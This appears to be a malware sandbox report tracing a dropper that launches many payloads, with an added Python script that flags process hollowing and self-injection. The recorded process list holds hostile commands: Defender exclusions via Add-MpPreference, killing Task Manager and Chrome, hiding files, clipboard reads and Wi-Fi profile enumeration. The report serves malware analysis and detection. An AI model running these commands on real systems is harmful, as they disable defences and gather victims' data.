Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5004 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 5004 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5004 wrote to memory of 5932 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build.exe
PID 5004 wrote to memory of 5932 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5932 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe
PID 5932 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 3192 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3992 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3992 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 wrote to memory of 5344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3992 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3992 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 5344 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5344 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 5360 wrote to memory of 5240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5360 wrote to memory of 5240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5004 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 5004 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 704 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 704 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
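In this sandbox's output an ordinary CreateProcess already yields two or three "wrote to memory of" rows per child (every dropper-to-payload pair above shows that), so the rows themselves are not the signal; the write count and the target are. TikTokDesktop18.exe writes eleven times into a freshly started MSBuild.exe and gdn5yfjd.exe eight times into InstallUtil.exe, the pattern of a loader launching a signed .NET host suspended and replacing its image (process hollowing), while winx86.exe writing into a second copy of winx86.exe is self-injection. The Python below is an added example, not part of the sandbox report: it parses rows of this shape, counts writes per parent/child pair, reconstructs the launch chain by treating the first writer as the parent, and flags pairs by write count, by known hollowing hosts, and by self-injection. The sample rows are a constructed subset of the table above with the report's repeat counts; the host list and the five-write threshold are this example's own.

```python
import re
import ntpath
from collections import Counter

# One row: PID <src> wrote to memory of <dst> N/A <src image> <dst image>
WPM_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\\S+) (C:\\\S+)$")

# Constructed sample: (repeat count, row) pairs reproducing a subset of the
# rows above together with how many times each appears in the report.
SAMPLE_ROWS = [
    (3, r"PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe"),
    (3, r"PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe"),
    (11, r"PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    (3, r"PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    (8, r"PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"),
    (2, r"PID 5004 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe"),
    (2, r"PID 704 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe"),
]
SAMPLE_LINES = [row for n, row in SAMPLE_ROWS for _ in range(n)]

# Signed .NET hosts that loaders commonly start suspended and overwrite
# (example's own list; extend it for your environment).
HOLLOWING_HOSTS = {"msbuild.exe", "installutil.exe", "regasm.exe", "regsvcs.exe",
                   "aspnet_compiler.exe", "applaunch.exe"}


def parse(lines):
    """Return (writes per (src, dst) pair, image path per PID)."""
    writes = Counter()
    image = {}
    for line in lines:
        m = WPM_RE.match(line)
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        image[src], image[dst] = src_img, dst_img
        writes[(src, dst)] += 1
    return writes, image


def parent_of(writes):
    """First process to write into a PID is taken as its parent (CreateProcess writes first)."""
    parents = {}
    for src, dst in writes:            # Counter preserves first-seen order
        parents.setdefault(dst, src)
    return parents


def chain(pid, parents, image):
    """Launch chain from the root dropper down to pid, as image basenames."""
    path = [pid]
    while pid in parents:
        pid = parents[pid]
        path.append(pid)
    return [ntpath.basename(image[p]) for p in reversed(path)]


def flag_injection(writes, image, min_writes=5):
    """Flag parent/child pairs whose writes look like injection rather than process start."""
    findings = []
    for (src, dst), n in writes.items():
        src_img, dst_img = image[src], image[dst]
        target = ntpath.basename(dst_img).lower()
        reasons = []
        if n >= min_writes:
            reasons.append(f"{n} writes; plain CreateProcess shows 2-3 here")
        if target in HOLLOWING_HOSTS:
            reasons.append("target is a signed .NET host commonly hollowed")
        if src_img.lower() == dst_img.lower():
            reasons.append("self-injection into a fresh copy of the same image")
        if reasons:
            findings.append({"src": src, "dst": dst, "target": target,
                             "writes": n, "reasons": reasons})
    return findings


if __name__ == "__main__":
    writes, image = parse(SAMPLE_LINES)
    parents = parent_of(writes)
    for f in flag_injection(writes, image):
        print(" -> ".join(chain(f["dst"], parents, image)), f["writes"], f["reasons"])
```

The chain output is what to carry into the incident record: the MSBuild.exe instance is not an attacker-supplied file but a system binary whose memory now belongs to TikTokDesktop18.exe, so file-based IOCs for it are useless and the hunt has to key on the parent, the write count, or the hollowed image in memory.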

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe"

C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe

"C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\build.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc [base64-encoded command omitted from this copy of the report]

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Users\Admin\AppData\Local\Temp\Files\333.exe

"C:\Users\Admin\AppData\Local\Temp\Files\333.exe"

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

"C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe"

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe detached

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\system32\taskkill.exe

taskkill /F /IM "taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\2802026625.exe

C:\Users\Admin\AppData\Local\Temp\2802026625.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\1392523614.exe

C:\Users\Admin\AppData\Local\Temp\1392523614.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\chcp.com

chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

